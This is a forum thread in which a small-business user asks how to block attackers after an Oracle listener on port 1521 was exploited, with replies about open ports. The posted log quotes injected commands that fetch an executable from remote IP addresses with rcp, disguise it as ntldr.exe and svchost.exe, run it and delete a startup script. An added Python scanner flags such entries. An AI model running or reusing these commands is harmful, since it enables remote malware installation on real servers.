DrayTek UK Users' Community Forum

Help, Advice and Solutions from DrayTek Users

Vigor 2600

03 Nov 2010 14:07 #1 by hot_dog
Hi. Can somebody tell me if it's possible to block certain IP addresses from accessing our network from the web.

It would appear we had a hack last night, didn't do too much damage as far as we are aware, but they tried copying files from a server to ours.

I'm sure they'll be back to finish the job, so I want to stop these IP addresses using the firewall in the router.

Trouble is, is this router too old for things like this?

03 Nov 2010 14:30 #2 by lozstlouis
These attacks on port 80? Or do you have some other means of entry?

www.alits.co.uk

03 Nov 2010 15:24 #3 by hot_dog
Hi Lozstlouis,

How can I tell how they gained entry? It would appear they tried to copy a file over to an Oracle server by pretending to be a user. They managed to copy an ora.bat file into the startup folder, then disabled the Oracle listener. Of course I restarted the server and the bat file was activated.

It would however appear that this bat file had failed to do its job, as the last command in the file was to delete the bat file, but it was still there after the reboot.

Contents of the file:

02-NOV-2010 22:13:11 * log_file * 0
02-NOV-2010 22:13:11 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || rcp -b 89.249.22.15.adm:/var/adm/.x/ka.exe c:\ntldr.exe || error

NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || c:\ntldr.exe || error

NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || rcp -b 140.117.31.8.adm:/var/adm/.x/ka.exe c:\svchost.exe || error

NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || c:\svchost.exe || error

NL-00303: syntax error in NV string
02-NOV-2010 22:13:13 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || del c:\Documents and Settings\All Users\Start Menu\Programs\Startup\ora.bat || error

NL-00303: syntax error in NV string

I'm confused as to why port 80 is visible on the web, as nothing is being redirected and management from the internet is turned off. But according to Shields Up, it can see port 80 is open, along with ports 23, 25 and 143.

Now we do have a mail server running, so this could have something to do with the above, but I don't really know.


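A defender-side check for the pattern in that listener log, added here as an example and not code from the thread, from DrayTek or from Oracle: it scans Oracle listener log text for TNS-01153 "Failed to process string" events whose rejected CONNECT_DATA string carries shell-like content (the `||` operators, `rcp`, `.exe` names) that the excerpt above shows. The sample log is constructed in the shape of that excerpt; its address and paths are illustrative, and the token list and parsing assumptions are mine.

```python
import re
from dataclasses import dataclass

# Constructed sample in the shape of the Oracle listener log excerpt above
# (the address and paths are illustrative, not the poster's real values).
SAMPLE_LOG = """\
02-NOV-2010 22:13:11 * log_file * 0
02-NOV-2010 22:13:11 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || rcp -b 198.51.100.7.adm:/var/adm/.x/ka.exe c:\\ntldr.exe || error

NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || c:\\ntldr.exe || error

NL-00303: syntax error in NV string
02-NOV-2010 22:14:00 * service_update * ORCL * 0
"""

# Shell operators, copy tools and Windows executables never belong in a CONNECT_DATA descriptor.
SUSPICIOUS = re.compile(r"\|\||\brcp\b|\bdel\b|\btftp\b|\.exe|\.bat", re.IGNORECASE)
EVENT = re.compile(r"^(\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* (\d+)$")
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")

@dataclass
class Finding:
    timestamp: str
    payload: str
    indicators: list   # which suspicious tokens appeared, lower-cased and sorted
    remote_hosts: list # IPv4 addresses named in the rejected string

def scan_listener_log(text):
    # Returns one Finding per TNS-01153 event whose rejected string looks like a command.
    findings = []
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = EVENT.match(lines[i])
        # Event code 1153 is followed by the TNS-01153 line, then the rejected string itself.
        if (m and m.group(2) == "1153" and i + 2 < len(lines)
                and lines[i + 1].startswith("TNS-01153")):
            payload = lines[i + 2].strip()
            hits = sorted({h.lower() for h in SUSPICIOUS.findall(payload)})
            if hits:
                findings.append(Finding(m.group(1), payload, hits, IPV4.findall(payload)))
            i += 3
            continue
        i += 1
    return findings
```

Run against a real listener.log, the remote_hosts field gives the addresses to block at the router firewall, which is the question the thread opened with.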
04 Nov 2010 10:12 #4 by lozstlouis
Port scanner detected 80 (sure remote management is off?) Port 23 (telnet) 25 (SMTP) & 143 (IMAP). So ports 25 & 143 will be your mail server. What is Oracle doing outward facing? Remote users? What port?

04 Nov 2010 10:26 #5 by hot_dog
Yes, remote management is off, tried a port scan again late last night and the only ports it found open this time were 23, 25 & 143.

I don't know why Oracle was outward facing, but it was on port 1521, which has now been removed, and which I'm now suspecting they used to connect to us.

There used to be remote users at one time......

04 Nov 2010 10:28 #6 by lozstlouis
Then that will probably slam the door shut on any foul play. What's the telnet port open for?
